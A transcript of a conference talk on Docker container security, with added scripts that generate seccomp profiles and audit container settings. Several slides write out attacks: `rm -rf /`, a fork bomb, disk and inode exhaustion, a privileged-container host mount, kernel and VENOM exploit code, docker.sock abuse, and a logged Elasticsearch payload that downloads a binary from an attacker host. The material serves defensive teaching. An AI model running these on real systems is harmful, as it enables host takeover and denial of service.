How Secure Are Docker Containers?

Presented at Velocity London 2017



  1. How Secure Are Containers? @Ben_Hall Ben@Katacoda.com Katacoda.com
  2. “Containers Don’t Contain”
  3. How Secure Are Containers? @Ben_Hall Ben@Katacoda.com Katacoda.com
  4. WHOAMI? @Ben_Hall / Blog.BenHall.me.uk Microsoft MVP – Cloud and Data Centre Management Tech Support > Tester > Developer > Founder > Docker London Organiser
  5. Learn for free via Interactive Browser-Based Labs Katacoda.com
  6. “What happens when you give anonymous unrestricted access to a hosted Docker container & daemon?” This is how we [try to] protect ourselves
  7. Google slowing down
  8. What an anonymous user types first:
      $ whoami
      $ pwd
      $ cd /
      $ ls
      $ apt-get install <some package>
      $ passwd
      $ rm -rf /
  9. Don't run as root. In the Dockerfile:
      RUN adduser <new user>
      USER <new user>
      or at run time:
      $ docker run -u <new user>
  10. CanIHazNonPrivilegedContainers.info
  11. $ whoami
      root
      $ fallocate -l 1000T /etc/hosts
      Docker bind-mounts the container's /etc/hosts from a file on the host (under /var/lib/docker/containers/), so writing to it fills the host's Docker partition, not the container's filesystem. Bye bye system.
  12. Everything about the host is visible from inside:
      $ uptime
      $ free -m
      $ df -h
      $ cat /proc/cpuinfo
      $ uname -a
  13. $ reboot
      $ shutdown now
  14. --net=host: “It also allows the container to access local network services like D-bus and is therefore considered insecure”
      $ docker run --net=host -it ubuntu bash
      root@ubuntu:/# shutdown now
      root@ubuntu:/#
      $ docker run --net=host -it ubuntu bash
      Post http://docker:2345/v1.20/containers/create: EOF.
      * Are you trying to connect to a TLS-enabled daemon without TLS?
      * Is your docker daemon up and running?
  15. --privileged Containers
  16. $ docker run --privileged -d nginx
      $ ./exploit
      container> df -h
      Filesystem   Size  Used  Avail  Use%  Mounted on
      overlay       19G  2.7G   15G   16%   /
      /dev/vda1     19G  2.7G   15G   16%   /etc/hosts
      shm           64M     0   64M    0%   /dev/shm
      container> mkdir -p /tmp2; mount /dev/vda1 /tmp2
      container> ls /tmp2
      container> cat /tmp2/root/.docker/config
      A privileged container keeps every capability and sees the host's block devices, so it can mount the host's root disk and read anything on it, here the host's Docker client configuration.
  17. Docker provides a lot out of the box but not everything… https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/2016/april/ncc_group_understanding_hardening_linux_containers-1-1.pdf
  18. :(){ :|: & };:   (a shell fork bomb: without a pids limit it exhausts the host's process table)
  19. Resource Exhaustion
  20. $ whoami
      root
      $ fallocate -l 1000T /etc/hosts
      $ whoami
      non-root-user
      $ fallocate -l 1000T /mydata
      Use the ZFS storage driver, which enables disk-space quotas per container (docker run --storage-opt size=...). Note that the quota covers the container's writable layer, which handles the /mydata case; /etc/hosts lives outside that layer on the host.
  21. Inodes are a separate resource from disk space:
      $ printf '%s ' {1..1310725} | xargs touch
      $ df -i
      Filesystem     Inodes   IUsed  IFree  IUse%  Mounted on
      /dev/xvda1    1310720 1310720      0   100%  /
      $ df -h
      Filesystem   Size  Used  Avail  Use%  Mounted on
      /dev/sda1     59G   16G   43G   26%   /
      Every inode is used while only 26% of the space is, so a space quota alone does not stop this.
  22. Privilege Escalation
  23. Kernel (Ubuntu 16.04) BPF Exploit. The fragment shown is only the final stage of the exploit, which spawns a shell once the kernel bug has granted root:
      #include <err.h>
      #include <stdio.h>
      #include <unistd.h>

      int main(void) {
          if (setuid(0) || setgid(0))
              err(1, "setuid/setgid");
          fputs("we have root privs now...\n", stderr);
          execl("/bin/bash", "bash", NULL);
          err(1, "execl");
      }
      https://www.exploit-db.com/exploits/39772/
  24. Restrictions
      • Namespaces – what can I see?
      • Capabilities – what can I do?
      • Cgroups – how much of something can I use?
      • Seccomp – what can I call?
      • AppArmor – what can my app do?
  25. Cgroup Settings: limit a container to a share of the resource
      > --cpu-shares
      > --cpuset-cpus
      > --memory-reservation
      > --kernel-memory
      > --blkio-weight (block IO)
      > --device-read-iops
      > --device-write-iops
      > --pids-limit (the cgroup control that stops the fork bomb on slide 18)
  26. Seccomp & AppArmor
  27. Everything is a syscall
      • In Linux all applications interact with the kernel via system calls
      • strace outputs all the calls a process makes
      • Seccomp limits which calls can or cannot be executed
  28. Seccomp profile rules (Docker's JSON profile format):
      { "name": "open", "action": "SCMP_ACT_ALLOW", "args": [] }
      { "name": "read", "action": "SCMP_ACT_ALLOW", "args": [] }
      { "name": "fchmodat", "action": "SCMP_ACT_ERRNO", "args": [] }
  29. { "name": "modify_ldt", "action": "SCMP_ACT_ERRNO", "args": [] }
  30. { "name": "mmap", "action": "SCMP_ACT_ERRNO", "args": [] }
      (denying mmap breaks almost every program, since the dynamic loader needs it: a profile can be too tight as well as too loose)
  31. $ docker run --security-opt seccomp=nodirtycow.json amouat/dirty-cow-test
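Slides 27 to 31 describe the workflow: trace the syscalls a workload makes, then allow only those. The script below, an added example that is not code from the talk or from Docker, does that end to end: it parses `strace -f` output (a constructed sample is embedded), builds a default-deny profile in the JSON shape Docker accepts for `--security-opt seccomp=...`, layers an explicit deny list on top, and evaluates what the resulting filter does for a given syscall. The `RUNTIME_SYSCALLS` set and the sample trace are assumptions.

```python
"""Derive a default-deny Docker seccomp profile from an strace capture.

Added example, not code from the talk or from Docker. It assumes a trace
recorded on a test run with `strace -f -qq -o trace.log <command>` and
emits the JSON shape Docker accepts with `--security-opt seccomp=...`.
"""
import json
import re

# Constructed sample of strace -f output (pid prefix, then the call).
# A real trace of a service under load runs to thousands of lines.
SAMPLE_TRACE = """\
1234 execve("/usr/sbin/nginx", ["nginx", "-g", "daemon off;"], 0x7ffd1a2b3c40) = 0
1234 openat(AT_FDCWD, "/etc/nginx/nginx.conf", O_RDONLY) = 3
1234 read(3, "user nginx;\\n", 4096) = 12
1234 socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
1234 bind(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
1234 epoll_wait(5, [], 512, -1 <unfinished ...>
1235 +++ exited with 0 +++
1234 <... epoll_wait resumed>) = 1
1234 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED} ---
"""

# "pid name(" for a normal call; "pid <... name resumed>" when another
# thread's line interrupted it. Signal and exit lines match neither.
_CALL = re.compile(r"^(?:\d+\s+)?([a-z_][a-z0-9_]*)\(")
_RESUMED = re.compile(r"^(?:\d+\s+)?<\.\.\. ([a-z_][a-z0-9_]*) resumed>")

# Calls the runtime needs before/after the traced program runs; a trace
# taken inside the container will not show all of them. Assumed minimum,
# extend it if the container fails to start.
RUNTIME_SYSCALLS = {"execve", "exit", "exit_group", "rt_sigreturn", "futex"}


def syscalls_from_strace(text):
    """Sorted list of distinct syscall names seen in strace output."""
    seen = set()
    for line in text.splitlines():
        m = _CALL.match(line) or _RESUMED.match(line)
        if m:
            seen.add(m.group(1))
    return sorted(seen)


def build_profile(observed, deny=()):
    """Default-deny profile: allow what was observed, return EPERM for
    everything else, and force EPERM for `deny` even if it was observed."""
    deny = set(deny)
    allowed = sorted((set(observed) | RUNTIME_SYSCALLS) - deny)
    rules = [{"names": allowed, "action": "SCMP_ACT_ALLOW", "args": []}]
    if deny:
        rules.append({"names": sorted(deny), "action": "SCMP_ACT_ERRNO", "args": []})
    return {
        "defaultAction": "SCMP_ACT_ERRNO",
        "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"],
        "syscalls": rules,
    }


def action_for(profile, name):
    """What the filter does for one syscall: the first matching rule wins,
    otherwise the default action applies."""
    for rule in profile["syscalls"]:
        if name in rule["names"]:
            return rule["action"]
    return profile["defaultAction"]


if __name__ == "__main__":
    names = syscalls_from_strace(SAMPLE_TRACE)
    profile = build_profile(names, deny={"ptrace", "modify_ldt"})
    print(json.dumps(profile, indent=2))
```

Write the output to a file and pass it with `--security-opt seccomp=profile.json`. An allowlist derived from one run only covers the code paths that run exercised: error handling, log rotation, signal handlers and shell-outs tend to show up later as EPERM failures, and the syscall a program uses varies with the libc build (open versus openat). Trace under realistic load, and when in doubt start from Docker's default profile and remove calls rather than from an empty list.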
  32. AppArmor
  33. Docker's example profile for nginx: no writes to system directories, no shells or top, and only the five capabilities nginx needs.
      $ cat docker-nginx
      #include <tunables/global>

      profile docker-nginx flags=(attach_disconnected,mediate_deleted) {
        #include <abstractions/base>

        network inet tcp,
        network inet udp,
        network inet icmp,

        deny network raw,
        deny network packet,

        file,
        umount,

        deny /bin/** wl,
        deny /boot/** wl,
        deny /dev/** wl,
        deny /etc/** wl,
        deny /home/** wl,
        deny /lib/** wl,
        deny /lib64/** wl,

        /usr/sbin/nginx ix,
        deny /bin/dash mrwklx,
        deny /bin/sh mrwklx,
        deny /usr/bin/top mrwklx,

        capability chown,
        capability dac_override,
        capability setuid,
        capability setgid,
        capability net_bind_service,

        deny @{PROC}/{*,**^[0-9*],sys/kernel/shm*} wkx,
        deny @{PROC}/sysrq-trigger rwklx,
        deny @{PROC}/mem rwklx,
        deny @{PROC}/kmem rwklx,
        deny @{PROC}/kcore rwklx,

        deny mount,

        deny /sys/[^f]*/** wklx,
        deny /sys/f[^s]*/** wklx,
        deny /sys/fs/[^c]*/** wklx,
        deny /sys/fs/c[^g]*/** wklx,
        # (remaining /sys deny rules truncated on the slide)
      }
  34. https://github.com/docker/libentitlement – an experimental proposal for coarse-grained entitlements in place of hand-written capability and seccomp lists, with proposed syntax such as:
      $ docker run --rights=network.admin nginx:latest
  35. Intel Clear Containers
  36. Each container runs in its own lightweight VM with its own kernel, so a kernel exploit such as Dirty COW stays inside the guest: https://clearlinux.org/blogs/how-intel%C2%AE-clear-containers-protects-against-root-kernel-exploits-dirty-cow
  38. Container Security Solutions
  39. What happens when it all goes wrong?
  40. Hosting provider becomes unhappy
  41. Attacker-supplied Java in an Elasticsearch script_fields query: the exposed node downloads and runs a binary from the attacker's host.
      org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [
      {"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/xdvi http://<IP Address>:9985/xdvi\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();"}}}
      ]]
      http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
  42. docker diff of the compromised container (A = added, C = changed): init-script persistence, a DDoS bot in /tmp, and replaced netstat/ps/ss with the originals moved to /usr/bin/dpkgd, consistent with a rootkit hiding its own processes and connections.
      C /bin
      C /bin/netstat
      C /bin/ps
      C /bin/ss
      C /etc
      C /etc/init.d
      A /etc/init.d/DbSecuritySpt
      A /etc/init.d/selinux
      C /etc/rc1.d
      A /etc/rc1.d/S97DbSecuritySpt
      A /etc/rc1.d/S99selinux
      C /etc/rc2.d
      A /etc/rc2.d/S97DbSecuritySpt
      A /etc/rc2.d/S99selinux
      C /etc/rc3.d
      A /etc/rc3.d/S97DbSecuritySpt
      A /etc/rc3.d/S99selinux
      C /etc/rc4.d
      A /etc/rc4.d/S97DbSecuritySpt
      A /etc/rc4.d/S99selinux
      C /etc/rc5.d
      A /etc/rc5.d/S97DbSecuritySpt
      A /etc/rc5.d/S99selinux
      C /etc/ssh
      A /etc/ssh/bfgffa
      A /os6
      A /safe64
      C /tmp
      A /tmp/.Mm2
      A /tmp/64
      A /tmp/6Sxx
      A /tmp/6Ubb
      A /tmp/DDos99
      A /tmp/cmd.n
      A /tmp/conf.n
      A /tmp/ddos8
      A /tmp/dp25
      A /tmp/frcc
      A /tmp/gates.lod
      A /tmp/hkddos
      A /tmp/hsperfdata_root
      A /tmp/linux32
      A /tmp/linux64
      A /tmp/manager
      A /tmp/moni.lod
      A /tmp/nb
      A /tmp/o32
      A /tmp/oba
      A /tmp/okml
      A /tmp/oni
      A /tmp/yn25
      C /usr
      C /usr/bin
      A /usr/bin/.sshd
      A /usr/bin/dpkgd
      A /usr/bin/dpkgd/netstat
      A /usr/bin/dpkgd/ps
      A /usr/bin/dpkgd/ss
      http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
  43. Read Only Containers
      > docker run --read-only -v /data:/data elasticsearch
      Every write the attacker made in slide 42 (/etc, /tmp, /usr/bin) fails on a read-only rootfs; the paths the application legitimately writes are supplied as volumes (or --tmpfs).
  44. Read Only Containers
      > docker run --read-only --security-opt no-new-privileges --security-opt apparmor=es-profile -v /data:/data elasticsearch
  45. Is Docker Secure?
      • Yes. Docker is secure*
      • Make sure you enable the security features
      • The Elasticsearch hack stayed inside the container; without one it would have taken over the entire box
      • *But only as secure as your practices
  46. $ docker run benhall/cute-kittens
      Error: Missing docker.sock
      Usage: docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens
      $ docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens
  47. What the image actually runs:
      if [ -e /var/run/docker.sock ]; then
          echo "**** Launching ****"
          docker run --privileged busybox ls /dev
          echo "**** Cute kittens ****"
      else
          echo "Error: Missing docker.sock"
      fi
      Anything inside the image can talk to the host's daemon through the mounted socket and start a privileged container, which is root on the host.
  48. $ docker run -v /var/run/docker.sock:/var/run/docker.sock -p 80:80 vulnerable-application
      With the socket mounted, a bug in the web application becomes control of the host.
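Slides 14 to 16 and 43 to 48 each show one runtime setting that decides whether a compromise stays inside the container. The script below, an added example that is not code from the talk or from Docker, reads the JSON printed by `docker inspect` and flags those settings in one pass: running as root (slides 8 to 10), `--privileged`, `--net=host`, a bind-mounted docker.sock, a writable rootfs, a missing pids limit (slides 18 and 53), `no-new-privileges` not set, and seccomp or AppArmor switched to unconfined. The two containers in the embedded sample are constructed; the field names (`Config.User`, `HostConfig.*`, `Mounts`) are the ones `docker inspect` emits.

```python
"""Audit `docker inspect` output for the settings this talk warns about.

Added example, not code from the talk or from Docker. It takes the JSON
that `docker inspect <container> ...` prints (a list, one object per
container) and reports the settings that let a compromise leave the
container.
"""
import json

DOCKER_SOCK = "/var/run/docker.sock"

# Constructed sample holding only the fields the checks read; a real
# inspect object has many more keys. Both containers are hypothetical.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/cute-kittens",
        "Config": {"User": "", "Image": "benhall/cute-kittens"},
        "HostConfig": {
            "Privileged": False, "NetworkMode": "default",
            "ReadonlyRootfs": False, "PidsLimit": 0, "SecurityOpt": None,
        },
        "Mounts": [{"Type": "bind", "Source": DOCKER_SOCK,
                    "Destination": DOCKER_SOCK, "RW": True}],
    },
    {
        "Name": "/nginx-hardened",
        "Config": {"User": "nginx", "Image": "nginx:latest"},
        "HostConfig": {
            "Privileged": False, "NetworkMode": "bridge",
            "ReadonlyRootfs": True, "PidsLimit": 100,
            "SecurityOpt": ["no-new-privileges", "apparmor=docker-nginx",
                            "seccomp=/etc/docker/nginx-seccomp.json"],
        },
        "Mounts": [{"Type": "volume", "Source": "esdata",
                    "Destination": "/data", "RW": True}],
    },
])


def audit_container(c):
    """Return the list of findings for one `docker inspect` object."""
    findings = []
    cfg = c.get("Config") or {}
    hc = c.get("HostConfig") or {}
    opts = hc.get("SecurityOpt") or []

    # No USER in the image and no -u at run time leaves Config.User empty.
    user = (cfg.get("User") or "").split(":")[0]
    if user in ("", "root", "0"):
        findings.append("runs as root")
    if hc.get("Privileged"):
        findings.append("--privileged: every capability plus the host's /dev")
    if hc.get("NetworkMode") == "host":
        findings.append("--net=host: shares the host's network namespace")
    for m in c.get("Mounts") or []:
        if m.get("Type") == "bind" and m.get("Source") == DOCKER_SOCK:
            mode = "rw" if m.get("RW") else "ro"
            findings.append("docker.sock bind-mounted (%s): root on the host" % mode)
    if not hc.get("ReadonlyRootfs"):
        findings.append("rootfs is writable (no --read-only)")
    limit = hc.get("PidsLimit")
    if not limit or limit < 0:          # null, 0 and -1 all mean unlimited
        findings.append("no --pids-limit")
    nnp = [o for o in opts if o.startswith("no-new-privileges")]
    if not nnp or nnp[-1].endswith("false"):
        findings.append("no-new-privileges not set")
    for name in ("seccomp", "apparmor"):
        if any(o in (name + "=unconfined", name + ":unconfined") for o in opts):
            findings.append(name + " disabled (unconfined)")
    return findings


def audit(inspect_json):
    """Map container name -> findings for the output of `docker inspect`."""
    return {c["Name"]: audit_container(c) for c in json.loads(inspect_json)}


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_INSPECT).items():
        print(name, "OK" if not findings else "")
        for f in findings:
            print("  -", f)
```

Feed it the real thing with `docker inspect $(docker ps -q) > inspect.json`. Two caveats: some distributions keep the socket at /run/docker.sock with /var/run as a symlink, so extend the source check if that applies, and a clean report says nothing about the image contents or the host's daemon configuration, which Docker Bench (slide 49) covers.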
  49. DockerBench.com
  50. Katacoda Security Content @ https://katacoda.com/courses/docker-security
  51. Security Without Containers?
  52. Think VMs contain?
      CVE-2016-3710: QEMU: out-of-bounds memory access issue
      VENOM (CVE-2015-3456), QEMU/KVM – attack via the floppy controller:
      #include <sys/io.h>
      #define FIFO 0x3f5              /* floppy controller data FIFO port */

      int main(void) {
          int i;
          iopl(3);                    /* raise I/O privilege so outb() works (root in the guest) */
          outb(0x0a, FIFO);           /* READ ID command */
          for (i = 0; i < 10000000; i++)
              outb(0x42, FIFO);       /* keep pushing bytes into the FDC's FIFO buffer */
          return 0;
      }
  53. • Privileged containers are not contained!
      • The docker.sock file is sensitive!
      • Apply Seccomp, AppArmor and PidsLimit: they will save you when things go wrong
      • Remember to run Docker Bench / Kubernetes Bench
      • IDS and container security tooling are still key
      https://katacoda.com/courses/docker-security
  54. @Ben_Hall Ben@Katacoda.com www.Katacoda.com
